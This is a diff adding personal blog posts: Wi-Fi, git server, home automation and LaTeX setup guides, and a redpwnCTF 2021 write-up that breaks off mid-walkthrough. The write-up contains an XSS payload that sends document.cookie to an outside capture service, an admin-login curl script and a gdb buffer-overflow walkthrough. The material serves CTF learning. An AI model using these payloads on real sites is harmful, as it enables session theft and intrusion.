6 files changed, 1658 insertions, 0 deletions
diff --git a/_items/avanswifi.md b/_items/avanswifi.md
new file mode 100644
index 0000000..7576f65
--- /dev/null
+++ b/_items/avanswifi.md
@@ -0,0 +1,51 @@
+---
+title: Avans eduroam wifi setup
+tags: software phone
+---
+
+I wasted 2 hours trying to set up my school's WiFi on my laptop, so here's a
+quick reference for other students who might've tried connecting but ended up
+giving up.
+
+Keep in mind that your username isn't your student e-mail, but the first letter
+of your first name, and 7 characters from your last name (not including a
+middle name if you have one), i.e.  `Loek Le Blansch -> lblansch`.
+
+# Linux with NetworkManager
+
+Steps for `nmcli`:
+
+```
+$ nmcli connection edit type wifi
+nmcli> set 802-11-wireless.ssid eduroam
+nmcli> set 802-1x.eap peap
+nmcli> set 802-1x.phase2-auth mschapv2
+nmcli> set 802-1x.identity <username>
+nmcli> set 802-1x.password <password>
+nmcli> set wifi-sec.key-mgmt wpa-eap
+nmcli> save
+nmcli> activate
+```
+
+# Android
+
+You can connect to eduroam without installing any additional apps by manually
+adding a network in the Android WiFi settings using the following connection
+settings:
+
+|field|value|
+|-|-|
+|**Network name/SSID**|`eduroam`|
+|**Security**|WPA3-Enterprise|
+|**EAP method**|PEAP|
+|**Phase 2 authentication**|MSCHAPV2|
+|**CA certificate**|Use system certificates|
+|**Minimum TLS version**|TLS v1.0|
+|**Online Certificate Status**|Do not verify|
+|**Domain**|`wifi.avans.nl`|
+|**Identity**|\<username\>|
+|**Anonymous identity**|anonymous|
+|**Password**|\<password\>|
+
+
+
diff --git a/_items/git.md b/_items/git.md
new file mode 100644
index 0000000..972243e
--- /dev/null
+++ b/_items/git.md
@@ -0,0 +1,180 @@
+---
+title: git server setup
+tags: git server software
+---
+
+This article details the configuration of my git server
+[git.pipeframe.xyz][pipeframe-git]. I have two access mechanisms set up:
+
+1. [**gitolite**][gitolite] for ssh access and permission management
+2. [**cgit**][cgit] for browsing and read-only access over HTTP
+
+# SSH Access with gitolite
+
+[Gitolite][gitolite] was a pain in the ass to set up because I didn't
+understand umasks before I started trying to set it up.
+
+A *umask* literally masks a file's permissions (or mode) when its created. You
+can think of it kind of like the "opposite" of what you'd enter when running
+`chmod`. For example: if I run `touch test`, I will now have a file with the
+same permissions as `chmod 644` (though the default umask may vary per distro).
+You can check this with the `stat` command:
+
+```sh
+$ touch test
+$ stat test
+  File: test
+  (bla bla)
+Access: (0644/-rw-r--r--)  Uid: ( 1000/	loek)   Gid: (  985/   users)
+```
+
+The 9 least significant bits in the 'Access' field contain flags that represent
+the file's permissions. This value is usually displayed using octal notation
+(0-7) because this neatly groups each 3-bit pair in a single digit:
+
+||user|group|world|
+|-:|:-:|:-:|:-:|
+|flags|`rw-`|`r--`|`r--`|
+|binary|`110`|`100`|`100`|
+|octal|`6`|`4`|`4`|
+
+The umask very literally *masks* each bit (using a bitwise and operation). If I
+want gitolite to create repositories with default permissions so other users
+can read but not write, I have to use a mode with the bits set of the
+permissions that I *don't* want to grant:
+
+||user|group|world|
+|-:|:-:|:-:|:-:|
+|unwanted|`---`|`-w-`|`-w-`|
+|binary|`000`|`010`|`010`|
+|octal|`0`|`2`|`2`|
+
+And now my `.gitolite.rc`:
+
+```perl
+%RC = (
+	UMASK => 0022,
+	WRITER_CAN_UPDATE_DESC => 1,
+	ROLES => {
+		READERS => 1,
+		WRITERS => 1,
+	},
+	
+	ENABLE => [
+		# commands
+		'help',
+		'desc',
+		'info',
+		'perms',
+		'writable',
+		'create',
+		'readme',
+		'D',
+
+		'ssh-authkeys', # authorization mechanism
+		'git-config', # read by cgit
+		'cgit', # updates 'description' file instead of 'gitweb.description' config
+	],
+);
+
+1;
+```
+
+# HTTP Access with cgit
+
+[Cgit][cgit] is probably the easiest thing to set up. It has great built-in
+documentation (`man 5 cgitrc`). Pretty much all configuration is in
+`/etc/cgitrc` (css/syntax highlighting isn't in there). The only reason I'm
+posting my config here is because for some reason the order of the options in
+`/etc/cgitrc` matters:
+
+```conf
+# cgit config; see cgitrc(5) for details
+
+cache-size=0
+
+enable-commit-graph=1
+enable-git-config=0
+enable-index-owner=0
+
+clone-url=https://git.pipeframe.xyz/$CGIT_REPO_URL git@pipeframe.xyz:$CGIT_REPO_URL
+
+max-repo-count=9999
+max-repodesc-length=9999
+
+css=/style.css
+logo=
+footer=
+
+virtual-root=/
+remove-suffix=1
+
+root-title=git.pipeframe.xyz
+root-desc=
+root-readme=/usr/local/lib/cgit/root-readme.md
+
+mimetype.gif=image/gif
+mimetype.html=text/html
+mimetype.jpg=image/jpeg
+mimetype.jpeg=image/jpeg
+mimetype.pdf=application/pdf
+mimetype.png=image/png
+mimetype.svg=image/svg+xml
+
+source-filter=/usr/lib/cgit/filters/syntax-highlighting.py
+about-filter=/usr/local/lib/cgit/filters/about-filter
+head-include=/usr/local/lib/cgit/head-include.html
+robots=
+
+readme=:README.md
+readme=:readme.md
+readme=:README.mkd
+readme=:readme.mkd
+readme=:README.rst
+readme=:readme.rst
+readme=:README.html
+readme=:readme.html
+readme=:README.htm
+readme=:readme.htm
+readme=:README.txt
+readme=:readme.txt
+readme=:README
+readme=:readme
+
+section-from-path=1
+scan-path=/srv/git
+```
+
+# Bonus tips
+
+## Cgit
+
+- Replace the default `about-filter` with a script that uses `pandoc` (or
+  similar) to convert readme pages to HTML. The built-in about-formatting\.sh
+  script doesn't properly render markdown.
+- I tweaked the [style.css](https://git.pipeframe.xyz/style.css) file
+- I added a custom [script.js](https://git.pipeframe.xyz/script.js) that adds
+  some quality of life improvements:
+  - Modifies the repository clone URLs to copy the URL on click instead of
+    navigating
+  - Make the root title a link to '/' for quickly clearing URL query parameters
+  - Open binary blobs in the tree explorer as raw instead of hexdump by default
+
+## Gitolite
+
+Because gitolite acts as the login shell for an SSH user, you'll get an
+annoying message each time you connect:
+
+> PTY allocation request failed on channel 0
+
+This can be fixed by placing the following in your `~/.ssh/config`:
+
+```ssh
+match user git host pipeframe.xyz
+	requesttty no
+```
+
+[pipeframe-git]: https://git.pipeframe.xyz
+[gitolite]: https://gitolite.com/gitolite/index.html
+[cgit]: https://git.zx2c4.com/cgit/about
+
diff --git a/_items/homeauto.md b/_items/homeauto.md
new file mode 100644
index 0000000..2a09970
--- /dev/null
+++ b/_items/homeauto.md
@@ -0,0 +1,255 @@
+---
+title: my home automation adventure
+tags:
+    - home automation
+    - raspberry pi
+    - esp8266
+    - software
+    - hardware
+    - hacking
+---
+
+Home automation is cool, but it can also be scary. I want to try to convert my
+existing bedroom lights into 'smart' lights that I can control using a home
+automation system.
+
+I've tried two home automation systems so far: homebridge and home assistant.
+Homebridge isn't really an automation system. It's meant to add unsupported
+devices to *homekit*, but doesn't work with anything other than apple devices.
+I've also tried (and am currently using) home assistant. It's a complete
+replacement for the homekit ecosystem, and it can do basically anything, as
+long as you're patient enough...
+
+The devices I'm going to try to automate are:
+
+- A random bluetooth RGB/white lamp I bought a couple years back
+- An RGB strip under my bed my mom got me for christmas
+- A gen 1 Philips LivingColors lamp from 2008
+- My Toshiba RAS-M10GKV-E2 air conditioning unit
+
+## Bluetooth RGB lamp
+
+This lamp is apparently another Chinese product that gets rebranded and sold
+under different names. I bought mine as the "[Shada led's
+light](http://leds-lightpro.com/node/4368)" (no the apostrophe isn't a typo).
+
+When scanning for bluetooth devices using `bluetoothctl` on Linux, it shows up
+as an LE device called "Beken LED".
+
+I don't remember what search term I used when searching for it's bluetooth
+protocol, but I landed on [this page](https://wiki.fhem.de/wiki/BEKEN_iLedBlub)
+from a german website about home automation, where it's called the "BEKEN
+iLedBulb". It documents which Bluetooth LE characteristics you need to write to
+for the lamp to change color.
+
+The lamp has both [iOS](https://apps.apple.com/us/app/leds-light/id1058642950)
+and
+[android](https://play.google.com/store/apps/details?id=com.shada.ledslight&hl=en_US&gl=US)
+apps available, though only the iOS app seemed to work.
+
+### Writing a homebridge plugin
+
+When I started out with this home automation business, I used homebridge
+because I didn't know about home assistant yet. Developing plugins for
+homebridge is actually pretty easy (after figuring out [how to get the plugin
+to load](https://github.com/homebridge/homebridge/issues/2958)). The
+documentation is pretty good, and it has typescript integration for maximum
+/comfy/-ness.
+
+Because HomeKit doesn't support RGBW or RGBWW lights (lights that have both rgb
+and dedicated white diodes), I chose to display them as seperate rgb and white
+lamps inside the home app.
+
+[The plugin](https://www.npmjs.com/package/homebridge-beken) is pretty janky,
+and requires some manual setup, but it worked very consistently for the single
+week I used it for.
+
+### Converting the homebridge plugin to home assistant
+
+Now that I could control a single bulb using the home app and siri, I needed
+more. The homebridge website allows for turning devices on/off, but doesn't
+allow color changes. I also liked the idea of controlling the lights using my
+phone, which runs android.
+
+Home assistant was the solution, so I went ahead and installed [home assistant
+core](https://www.home-assistant.io/installation/linux#install-home-assistant-core)
+on the Raspberry Pi 3B+ I'm using as a dedicated home automation hub.
+
+Upon opening it for the first time, I noticed it was much slower than
+homebridge, but that's because it was installing a bunch of other stuff in the
+background. After waiting for the background tasks to complete, I was greeted
+with a very nice web interface. There were also already devices that I could
+integrate immediately, like the downstairs chromecasts, and my Jellyfin server.
+
+Now I had to figure out how to write a plugin for home assistant. There's some
+concepts in the home assistant ecosystem that I didn't quite understand, which
+made searching where to start harder. 
+
+**Integrations** are like plugins, they allow you to *integrate* an unsupported
+device into home assistant. Integrations create **devices** which create
+**entities** (device properties). Certain entity types can only be read (like
+`sensor`), and others can also be updated / written to (lights).
+
+The documentation for creating entity integrations is pretty poopy, and I
+mostly used other plugins on GitHub as reference material. The home assistant
+plugin code is available on
+[GitHub](https://github.com/lonkaars/homeassistant-beken) and [my personal git
+server](https://git.pipeframe.xyz/lonkaars/homeassistant-beken/about).
+
+## RGB gamer bed
+
+I was originally planning to control this strip using IR remote emulation, but
+I remembered a friend of mine still had an esp8266 laying around. So I went the
+extra mile and wanted to try to create a new driver board for the strip
+instead.
+
+### Opening the original driver
+
+![](/img/homeauto/controller_original.jpg)
+
+![](/img/homeauto/opening_controller.jpg)
+
+![](/img/homeauto/open_controller.jpg)
+
+![](/img/homeauto/controller_board.jpg)
+
+### Making a custom driver board
+
+**I AM NOT AN ELECTRICIAN**. I looked on the internet, and I think this is just
+a simple board with some mosfets and flash memory for storing the 6 custom
+colors. The mosfets are the 3 big squares labeled Q1, Q2 and Q3. The way the
+strip works is it gets +12v though the black wire, and then lights up when you
+ground any combination of the red, green, and blue wires. The strip dims using
+pulse width modulation. The mosfets act like an electronic switch, and control
+the grounding of the colored wires.
+
+I'm going to salvage the mosfets, and barrel plug from the original driver
+board, and resolder them on a perfboard with the esp8266 so I can control them
+over WiFi. The schematic I'm using comes from
+[instructables](https://www.instructables.com/WiFi-Controlled-RGB-LED-Strip-With-ESP8266/).
+
+![](/img/homeauto/schematic.png)
+
+The whole solder job was a complete massacre, and I really don't want to show
+it. It does work though, but I had to buy a new soldering station because my
+old soldering iron wasn't really fit for soldering small electronics.
+
+### Beautiful dremel work
+
+I wanted to use the original enclosure instead of a tupperware container this
+time, so I used my dad's dremel to create holes for the esp to fit.
+
+![](/img/homeauto/shittydremel.png)
+
+![](/img/homeauto/espfit.png)
+
+As you can see I did a great job :^)
+
+The esp is still at the bottom of the case, but getting everything to fit
+inside was so hard that I completely forgot to take pictures. So here's a
+picture of the finished controller mounted under my bed using two small nails:
+
+<figure>
+  <img src="/img/homeauto/finishedcontroller.png"/>
+  <figcaption>Job well done</figcaption>
+</figure>
+
+### ESP firmware
+
+The firmare I wrote for the esp is available on
+[GitHub](https://github.com/lonkaars/esp8266-rgbstrip) and [my git
+server](https://git.pipeframe.xyz/lonkaars/esp8266-rgbstrip/about), along with
+the home assistant plugin
+([GitHub](https://github.com/lonkaars/hass-esp8266-rgbstrip),
+[cgit](https://git.pipeframe.xyz/lonkaars/hass-esp8266-rgbstrip/about)). I used
+the [espressif ESP8266_RTOS_SDK](https://github.com/espressif/ESP8266_RTOS_SDK)
+toolchain with gnu make as my build system.
+
+It just connects to your specified wifi network under your specified hostname,
+and listens on port 80 for regular http requests. Here's how to use it without
+the home assistant plugin:
+
+```bash
+# get color
+curl http://hostname/
+
+# set color      rrggbb color (hex)
+curl -X POST -d "0000ff" http://hostname/
+```
+
+Some cool features this firmare has are:
+
+- Linearly interpolated color transitions with customizable transition and step
+	duration
+- Brightness curve correction (makes difference in brightness more pronounced
+	at higher brightness levels by using a parabolic curve)
+
+I'm not sure if the more popular [ESPHome](https://esphome.io/) firmare has
+these features, but I wanted to have a go at writing my own firmare anyways.
+
+### Safety
+
+Because the esp8266 is a pretty basic microcontroller, it doesn't use https or
+ssl for encryption. To protect from people in my house wanting to control my
+lights, I used the raspberry pi's onboard wifi module to create a hidden
+private isolated wifi network for this, and all future IoT devices in my
+bedroom. I'm using `hostapd` to create the wifi network, and `dnsmasq` for
+assigning ip addresses and hostname resolution. Here's the config file for
+`dnsmasq`:
+
+```
+no-resolv
+interface=wlan0
+dhcp-range=10.0.0.1,10.0.0.16,24h
+server=8.8.8.8
+```
+
+And here's `hostapd`'s config file:
+
+```bash
+# common settings
+interface=wlan0
+driver=nl80211
+ssid=network_name_here
+hw_mode=g
+channel=1
+macaddr_acl=0
+auth_algs=1
+ignore_broadcast_ssid=1
+wpa=2
+wpa_passphrase=network_password_here
+wpa_key_mgmt=WPA-PSK
+rsn_pairwise=CCMP
+
+# raspberry pi 3b+ specific settings
+ieee80211n=1          # 802.11n support
+wmm_enabled=1         # QoS support
+ht_capab=[HT40+][SHORT-GI-20][DSSS_CCK-40]
+```
+
+Very complicated stuff...
+
+## Philips LivingColors lamp
+
+[This](http://www.knutsel.org/2009/01/01/livingcolors-1st-generation/) article
+describes all the research that went into reverse-engineering the lamp.
+
+I ordered a cc2500 wireless transmitter and receiver, but the seller cancelled
+the order, and now I have to wait a while longer to get one. I'll update this
+article once I've set it up though.
+
+## Toshiba air conditioning unit
+
+I created a small daughter board to connect to the raspberry pi's gpio pins,
+that has an IR phototransistor and IR blaster. This is so I could record and
+replay the IR messages from the remote more easily.
+
+I've spent a solid two days now trying to use my raspberry pi or arduino uno as
+a janky logic analyzer, to capture the IR messages and get the message contents
+manually, but I still haven't succeeded. I have however succeeded in frying the
+IR LED by giving it +5v backwards without any protection, so that's something I
+guess. I'll update this section of the article together with the Philips lamp.
+
+
+To be continued...
+
diff --git a/_items/latex.md b/_items/latex.md
new file mode 100644
index 0000000..91ca063
--- /dev/null
+++ b/_items/latex.md
@@ -0,0 +1,127 @@
+---
+title: My LaTeX setup
+tags: software latex git
+---
+
+I started using LaTeX instead of MS Word about two years ago, and I've never
+regretted the decision. I switched out of frustration because Word makes it
+really easy to mess up your document structure without you noticing.
+
+## Cool features LaTeX gets you
+
+- Automatically numbered figures with references that automatically update
+- Really simple bibliography management with `biblatex`
+- Packages that help you typeset scientific things like chemistry or physics
+- Professional looking output documents with very little effort
+- Automation of repetitive things with macros
+- It's a plain text format, so it works well with `git` or other version
+	control software
+- Probably more
+
+## Installation
+
+This guide is for Arch Linux and it's derivatives, but you can use
+[pkgs.org](https://pkgs.org) to find the mentioned packages if they're under a
+different name in your distro's package manager.
+
+### Required packages
+
+- `biber`
+- `texlive-most`, containing:
+	- `texlive-bibtexextra`
+	- `texlive-core `
+	- `texlive-fontsextra `
+	- `texlive-formatsextra`
+	- `texlive-games`
+	- `texlive-humanities`
+	- `texlive-latexextra`
+	- `texlive-music`
+	- `texlive-pictures`
+	- `texlive-pstricks`
+	- `texlive-publishers`
+	- `texlive-science`
+
+tl;dr
+
+```
+# pacman -S texlive-most biber
+```
+
+### Force XeTeX compiler with latexmk
+
+To force latexmk to use the `xelatex` compiler instead of `pdflatex` you can
+create `~/.config/latexmk/latexmkrc` with the following content:
+
+```
+$pdflatex = "xelatex %O %S";
+$pdf_mode = 1;
+$dvi_mode = 0;
+$postscript_mode = 0;
+```
+
+
+## Hello world
+
+> I have recently made another repository on my profile for template files, you
+> can find it [here on github](https://github.com/lonkaars/templates) or [here
+> on git.pipeframe.xyz](https://git.pipeframe.xyz/lonkaars/templates). It
+> includes a latex starting point with more commonly used packages, and other
+> files I tend to copy from other projects
+
+LaTeX uses a lot of auxiliary files for compilation, so it's a good idea to
+create a new directory for every document. After creating a new directory,
+create a .tex file and open it with a text editor.
+
+```tex
+\documentclass[12pt, a4paper, dutch]{article}
+\usepackage[margin=1in]{geometry}
+\usepackage{babel}
+
+\bigskipamount=7mm
+\medskipamount=4mm
+\parindent=0mm
+
+\begin{document}
+Hello world!
+\end{document}
+```
+
+This is the starting point I generally use for all my documents. It uses a4
+paper and 2.54cm margins, which is the default in Word (in Europe). Because
+most of my documents are in Dutch, I add the `dutch` option to my document
+class, and import the babel package for correct word breaking and built-in
+latex heading translations. I also disable paragraph indenting, and modify the
+`\bigskip` and `\medskip` distances.
+
+After creating the .tex file, you can run `latexmk <your .tex file>` to compile
+the document. When it's done, you should have a new .pdf file in your directory
+with the same name as the .tex file.
+
+Keep in mind that you can probably install an extension for your text editor to
+have it automatically compile and refresh your document for you. If you're
+using Visual Studio Code, you can use the [LaTeX
+Workshop](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop)
+extension, and for vim I use [vimtex](https://github.com/lervag/vimtex) with
+[coc-vimtex](https://github.com/neoclide/coc-vimtex) for
+[coc](https://github.com/neoclide/coc.nvim).
+
+## Notes
+
+### LaTeX and git
+
+Because LaTeX creates a lot of temporary files, you should add the following to
+your repository's `.gitignore`:
+
+```gitignore
+*.aux
+*.bbl
+*.bcf
+*.blg
+*.fdb_latexmk
+*.fls
+*.log
+*.out
+*.run.xml
+*.synctex.gz
+```
+
diff --git a/_items/redpwn2021.md b/_items/redpwn2021.md
new file mode 100644
index 0000000..dab85ee
--- /dev/null
+++ b/_items/redpwn2021.md
@@ -0,0 +1,773 @@
+---
+title: redpwnCTF 2021
+tags: hacking CTF writeup
+---
+
+This is the first 'real' CTF I've participated in. About two weeks ago, a
+friend of mine was stuck on some challenges from the Radboud CTF. This was a
+closed CTF more geared towards beginners (high school students), and only had a
+few challenges which required deeper technical knowledge of web servers and
+programming. Willem solved most of the challenges, and I helped solve 3 more.
+
+Apart from those challenges, basically all my hacking knowledge comes from
+computerphile videos, liveoverflow videos and making applications myself.
+
+> epic announcement!!!
+> 
+> Willem has added explanations of the challenges he solved, so go read them!
+
+## Challenges
+
+### web/pastebin-1
+
+This challenge is a simple XSS exploit. The website that's vulnerable is
+supposed to be a clone of pastebin. I can enter any text into the paste area,
+and it will get inserted as HTML code into the website when someone visits the
+generated link.
+
+The challenge has two sites: one with the pastebin clone, and one that visits
+any pastebin url as the website administrator. The goal of this challenge is
+given by it's description:
+
+> Ah, the classic pastebin. Can you get the admin's cookies?
+
+In JS, you can read all cookies without the `HttpOnly` attribute by reading
+`document.cookie`. This allows us to read the cookies from the admin's browser,
+but now we have to figure out a way to get them sent back to us.
+
+Luckily, there's a free service called [hookbin](https://hookbin.com/) that
+gives you an http endpoint to send anything to, and look at the request
+details.
+
+Combining these two a simple paste can be created:
+
+```html
+<script>
+	var post = new XMLHttpRequest();
+	post.open("post", "https://hookb.in/<endpoint url>");
+	post.send(document.cookie);
+</script>
+```
+
+### crypto/scissor
+
+I wasn't planning on including this one, but it makes use of the excellent
+[CyberChef](https://gchq.github.io/CyberChef/) tool. The flag is given in the
+challenge description, and is encrypted using a ceasar/rot13 cipher. A simple
+python implementation of this cipher is included with the challenge, but I just
+put it into CyberChef and started trying different offsets.
+
+### rev/wstrings
+
+> Some strings are wider than normal...
+
+This challenge has a binary that uses a simple `strcmp` to check the flag. When
+running the program, the following output is visible:
+
+```sh
+# ./wstrings
+Welcome to flag checker 1.0.
+Give me a flag>
+```
+
+My first stategy was running the `strings` utility on the `wstrings` binary,
+but I didn't find the flag. What was interesting to me though was that I also
+couldn't find the prompt text... This immediately made me check for other
+string encodings.
+
+Running the `strings` utility with the `-eL` flag tells `strings` to look for
+32-bit little-endian encoded strings, and lo and behold the flag shows up!
+
+This is because ascii strings are less 'wide' than 32-bit strings:
+
+```
+          --- ascii ---
+
+hex -> 0x68 0x65 0x6c 0x6c 0x6f
+str -> h    e    l    l    o
+```
+
+Notice how each character is represented by a single byte each (8 bits) in
+ascii, as opposed to 32-bit characters in 32-bit land.
+
+```
+        --- 32-bit land ---
+
+hex -> 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f
+str -> h          e          l          l          o
+```
+
+I think 32-bit strings also have practical use for things like non-English
+texts such as Hebrew, Chinese or Japanese. Those characters take up more space
+anyways, and you would waste less space by not using unicode escape characters.
+
+### web/secure
+
+> Just learned about encryption—now, my website is unhackable!
+
+This challenge is pretty simple if you know some of JS's quirks. Right at the
+top of the file is an sqlite3 expression in JS:
+
+```js
+////////
+db.exec(`INSERT INTO users (username, password) VALUES (
+    '${btoa('admin')}',
+    '${btoa(crypto.randomUUID)}'
+)`);
+```
+
+This section of code immediately jumped out to me because I noticed that
+`crypto.randomUUID` wasn't actually being called.
+
+Because the 'random uuid' is being fed into `btoa()` it becomes a base64
+encoded string. However, `btoa()` also expects a string as input. Because every
+object in JS has a `.toString()` method, when you pass it into a function
+expecting another type, JS will happily convert it for you without warning.
+
+This means that the admin's password will always be a base64-encoded version of
+`crypto.randomUUID`'s source code. We can get that base64-encoded source code
+by running the following in a NodeJS REPL:
+
+```js
+// import file system and crypto modules
+var writeFileSync = require('fs').writeFileSync;
+var crypto = require('crypto');
+
+// write source to file
+writeFileSync('./randomUUID.js', btoa(crypto.randomUUID.toString()), 'utf-8');
+```
+
+I made a simple shell script that calls cURL with the base64-encoded
+parameters, and decodes the url-encoded flag afterwards:
+
+```sh
+#!/bin/sh
+
+# https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell
+function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; }
+
+urldecode $(curl -sX POST \
+	-d "username=$(printf 'admin' | base64)" \
+	-d "password=$(cat ./randomUUID.js)" \
+	https://secure.mc.ax/login)
+```
+
+### crypto/baby
+
+> I want to do an RSA!
+
+This challenge is breaking RSA. It only works because the `n` parameter is
+really small.
+
+Googling for 'rsa decrypt n e c' yields
+[this](https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c)
+stackoverflow result, which links to
+[dcode.fr](https://www.dcode.fr/rsa-cipher). The only thing left to do is
+calculate `p` and `q`, which can be done using [wolfram
+alpha](https://wolframalpha.com/).
+
+### pwn/beginner-generic-pwn-number-0
+
+> rob keeps making me write beginner pwn! i'll show him...
+>
+> `nc mc.ax 31199`
+
+This was my first interaction with `gdb`. It was.. painful. After begging for
+help in the redpwnCTF discord server about another waaaay harder challenge, an
+organizer named asphyxia pointed me towards [gef](https://github.com/hugsy/gef)
+which single-handedly saved my sanity during the binary exploitation
+challenges.
+
+The first thing I did was use [iaito](https://github.com/radareorg/iaito) to
+look at a disassembly graph of the binary. Iaito is a graphical front-end to
+the radare2 reverse engineering framework, and I didn't feel like learning two
+things at the same time, so that's why I used it. While it's very
+user-friendly, I didn't look into reverse engineering tools very much, and
+didn't realise that iaito is still in development. Let's just say I ran into
+some issues with project saving so I took lots of unnecessary repeated steps.
+
+After trying to make sense of assembly code after just seeing it for the first
+time, I instead decided looking at the source code would be a better idea since
+I actually know c.
+
+```c
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+const char *inspirational_messages[] = {
+  "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"",
+  "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"",
+  "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"",
+};
+
+int main(void)
+{
+  srand(time(0));
+  long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));
+  char heartfelt_message[32];
+  
+  setbuf(stdout, NULL);
+  setbuf(stdin, NULL);
+  setbuf(stderr, NULL);
+
+  puts(inspirational_messages[inspirational_message_index]);
+  puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
+  puts("can you write me a heartfelt message to cheer me up? :(");
+
+  gets(heartfelt_message);
+
+  if(inspirational_message_index == -1) {
+    system("/bin/sh");
+  }
+}
+```
+
+After looking at this source things became a lot clearer, because the only
+input you can actually control is received from `gets(...);`
+
+Now comes the hard part: doing it, but in assembly!
+
+Some resources you should consume before attempting binary exploitation would
+be [computerphile's video on buffer
+overflows](https://www.youtube.com/watch?v=1S0aBV-Waeo) and
+[cheat.sh/gdb](https://cheat.sh/gdb) for some basic gdb commands. The rest of
+this section assumes you know the basics of both buffer overflows and gdb.
+
+First, let's print a disassembly of the `int main()` function:
+
+```
+(gdb) disas main
+Dump of assembler code for function main:
+   0x000000000040127c <+134>:   call   0x4010a0 <puts@plt>
+   0x0000000000401281 <+139>:   lea    rdi,[rip+0xec8]        # 0x402150
+   0x0000000000401288 <+146>:   call   0x4010a0 <puts@plt>
+   0x000000000040128d <+151>:   lea    rdi,[rip+0xf1c]        # 0x4021b0
+   0x0000000000401294 <+158>:   call   0x4010a0 <puts@plt>
+   0x0000000000401299 <+163>:   lea    rax,[rbp-0x30]
+   0x000000000040129d <+167>:   mov    rdi,rax
+   0x00000000004012a0 <+170>:   call   0x4010f0 <gets@plt>
+   0x00000000004012a5 <+175>:   cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
+   0x00000000004012aa <+180>:   jne    0x4012b8 <main+194>
+   0x00000000004012ac <+182>:   lea    rdi,[rip+0xf35]        # 0x4021e8
+   0x00000000004012b3 <+189>:   call   0x4010c0 <system@plt>
+   0x00000000004012b8 <+194>:   mov    eax,0x0
+   0x00000000004012bd <+199>:   leave
+   0x00000000004012be <+200>:   ret
+End of assembler dump.
+```
+
+This isn't the full output from gdb, but only the last few lines. A few things
+should immediately stand out: the 3 `<puts@plt>` calls, and right after the
+call to `<gets@plt>`. These are the assembly equivalent of:
+
+```c
+puts(inspirational_messages[inspirational_message_index]);
+puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
+puts("can you write me a heartfelt message to cheer me up? :(");
+
+gets(heartfelt_message);
+```
+
+Since I didn't see any reference to a flag file being read, I assumed that the
+`system("/bin/sh")` call is our main target, so let's see if we can find that
+in our assembly code. There's a call to `<system@plt>` at `<main+189>`, and
+there's other weird `cmp`, `jne` and `lea` instructions before. Let's figure
+out what those do!
+
+After some stackoverflow soul searching, I found out that the `cmp` and `jne`
+are assembly instructions for compare, and jump-if-not-equal. They work like
+this:
+
+```asm6502
+;  cmp compares what's in the $rbp register to 0xffffffffffffffff
+;  and turns on the ZERO flag if they're equal
+   0x004012a5 <+0>:  cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
+   
+;  jne checks if the ZERO flag is on,
+;  and if it is it jumps (in this case) to 0x4012b8
+┌--0x004012aa <+1>:  jne    0x4012b8 <main+194>
+│; we can safely ignore the `lea` instruction as it doesn't impact our pwn
+│  0x004012ac <+2>:  lea    rdi,[rip+0xf35]        # 0x4021e8
+│
+│; the almighty syscall
+│  0x004012b3 <+3>:  call   0x4010c0 <system@plt>
+│
+│; from here on the program exits without calling /bin/sh
+└->0x004012b8 <+4>:  mov    eax,0x0
+   0x004012bd <+5>:  leave
+   0x004012be <+6>:  ret
+```
+
+The program checks if there's `0xffffffffffffffff` in memory `0x8` bytes before
+the `$rbp` register. The program allocates 32 bytes of memory for our heartfelt
+message, but it continues reading even if our heartfelt message is longer than
+32 bytes. Let's see if we can overwrite that register >:)
+
+Let's set a breakpoint after the `<gets@plt>` call in gdb, and run the program
+with 40 bytes of `0x61` ('a')
+
+```
+(gdb) break *0x00000000004012a5
+Breakpoint 1 at 0x4012a5
+
+(gdb) run < <(python3 -c "print('a' * 40)")
+```
+
+I'm using the `run` command with `<` and `<()` to pipe the output of python
+into the program's `stdin`. It's unnecessary at this stage because there's an
+'a' key on my keyboard, but if we were to send raw bytes, this would make it a
+lot easier.
+
+I'm also using [gef](https://github.com/hugsy/gef) so I get access to a command
+called `context` which prints all sorts of information about registers, the
+stack and a small disassembly window. I won't show it's output here, but it
+was an indispensable tool that you should install nonetheless.
+
+Let's print the memory at `[$rbp - 0x8]`:
+
+```
+(gdb) x/8gx $rbp - 0x8
+0x7fffffffd758:  0x0000000000000000 0x0000000000000000
+0x7fffffffd768:  0x00007ffff7de4b25 0x00007fffffffd858
+0x7fffffffd778:  0x0000000100000064 0x00000000004011f6
+0x7fffffffd788:  0x0000000000001000 0x00000000004012c0
+```
+
+Hmmm, no overwriteage yet. Let's try 56 bytes instead:
+
+```
+(gdb) run < <(python3 -c "print('a' * 56)")
+(gdb) x/8gx $rbp - 0x8
+0x7fffffffd758:  0x6161616161616161 0x6161616161616161
+0x7fffffffd768:  0x00007ffff7de4b00 0x00007fffffffd858
+0x7fffffffd778:  0x0000000100000064 0x00000000004011f6
+0x7fffffffd788:  0x0000000000001000 0x00000000004012c0
+(gdb) x/1gx $rbp - 0x8
+0x7fffffffd758: 0x6161616161616161
+```
+
+Jackpot! We've overwritten 16 bytes of the address that the `cmp` instruction
+reads. Let's try setting it to `0xff` instead, so we get a shell. Python 3 is
